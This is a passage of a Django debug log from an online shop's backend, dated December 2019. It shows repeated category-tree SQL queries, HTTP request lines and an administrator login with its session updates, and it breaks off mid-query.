"shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:48:39,603 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:48:39,607 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:48:39,610 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:48:39,613 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:48:39,616 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:48:39,619 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:48:39,624 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:48:39,626 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:48:39,629 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:48:39,632 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:48:39,634 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:48:39,637 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:48:39,640 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:48:39,642 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:48:39,644 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:48:39,648 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:48:39,654 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:48:39,658 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:48:39,662 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:48:39,666 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:48:39,670 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:48:39,673 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:48:39,679 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:48:39,683 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:48:39,686 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:48:39,690 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:48:39,694 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:48:39,700 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:48:39,703 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:48:39,707 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:48:39,711 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:48:39,715 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:48:39,721 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:48:39,724 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:48:39,729 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:48:39,732 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:48:39,736 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:48:39,739 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:48:39,744 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:48:39,748 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:48:39,751 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:48:39,756 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:48:39,759 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:48:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 06:48:40] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [27/Dec/2019 06:48:40] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [27/Dec/2019 06:48:40] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [27/Dec/2019 06:48:40] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 DEBUG 2019-12-27 06:48:48,078 utils 4252 140031732287232 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:48.066743+00:00'::timestamptz AND "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'); args=(datetime.datetime(2019, 12, 27, 6, 48, 48, 66743, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') [27/Dec/2019 06:48:48] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 06:48:48,348 utils 4252 140031732287232 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:48.339070+00:00'::timestamptz AND "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'); args=(datetime.datetime(2019, 12, 27, 6, 48, 48, 339070, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') DEBUG 2019-12-27 06:48:48,385 utils 4252 140031732287232 (0.003) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-10T06:48:48.381023+00:00'::timestamptz WHERE "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 6, 48, 48, 381023, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') [27/Dec/2019 06:48:48] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 06:48:48] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [27/Dec/2019 06:48:48] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [27/Dec/2019 06:48:48] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 Not Found: /robots.txt [27/Dec/2019 06:48:48] "GET /robots.txt HTTP/1.0" 404 6453 DEBUG 2019-12-27 06:48:49,319 utils 4252 140031492613888 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:49.310146+00:00'::timestamptz AND "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'); args=(datetime.datetime(2019, 12, 27, 6, 48, 49, 310146, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') [27/Dec/2019 06:48:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 06:48:49,581 utils 4252 140031492613888 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:49.572363+00:00'::timestamptz AND "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'); args=(datetime.datetime(2019, 12, 27, 6, 48, 49, 572363, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') DEBUG 2019-12-27 06:48:49,606 utils 4252 140031492613888 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-10T06:48:49.604668+00:00'::timestamptz WHERE "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 6, 48, 49, 604668, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') [27/Dec/2019 06:48:49] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 06:48:50] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [27/Dec/2019 06:48:50] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [27/Dec/2019 06:48:50] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 Not Found: /favicon.ico [27/Dec/2019 06:48:50] "GET /favicon.ico HTTP/1.0" 404 6456 DEBUG 2019-12-27 06:48:53,815 utils 4252 140031492613888 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:53.801810+00:00'::timestamptz AND "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'); args=(datetime.datetime(2019, 12, 27, 6, 48, 53, 801810, tzinfo=), 'is8o7rsilzem66a30nrz07ipjg18tbfy') DEBUG 2019-12-27 06:48:53,820 utils 4252 140031492613888 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-27 06:48:54,042 utils 4252 140031492613888 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda' LIMIT 1; args=('8hyn47cjuae89j7mbn5kpmybirz8ihda',) DEBUG 2019-12-27 06:48:54,044 utils 4252 140031492613888 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8hyn47cjuae89j7mbn5kpmybirz8ihda', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T06:48:54.042794+00:00'::timestamptz); args=('8hyn47cjuae89j7mbn5kpmybirz8ihda', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 6, 48, 54, 42794, tzinfo=)) DEBUG 2019-12-27 06:48:54,046 utils 4252 140031492613888 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'is8o7rsilzem66a30nrz07ipjg18tbfy'; args=('is8o7rsilzem66a30nrz07ipjg18tbfy',) DEBUG 2019-12-27 06:48:54,048 utils 4252 140031492613888 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('is8o7rsilzem66a30nrz07ipjg18tbfy'); args=('is8o7rsilzem66a30nrz07ipjg18tbfy',) DEBUG 2019-12-27 06:48:54,053 utils 4252 140031492613888 (0.002) UPDATE "auth_user" SET "last_login" = '2019-12-27T06:48:54.050351+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 27, 6, 48, 54, 50351, tzinfo=), 6) DEBUG 2019-12-27 06:48:54,059 utils 4252 140031492613888 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T06:48:54.056874+00:00'::timestamptz WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 6, 48, 54, 56874, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') [27/Dec/2019 06:48:54] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-27 06:48:54,372 utils 4252 140031492613888 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T06:48:54.357799+00:00'::timestamptz AND "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'); args=(datetime.datetime(2019, 12, 27, 6, 48, 54, 357799, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') DEBUG 2019-12-27 06:48:54,376 utils 4252 140031492613888 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 06:48:54,433 utils 4252 140031492613888 (0.005) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE 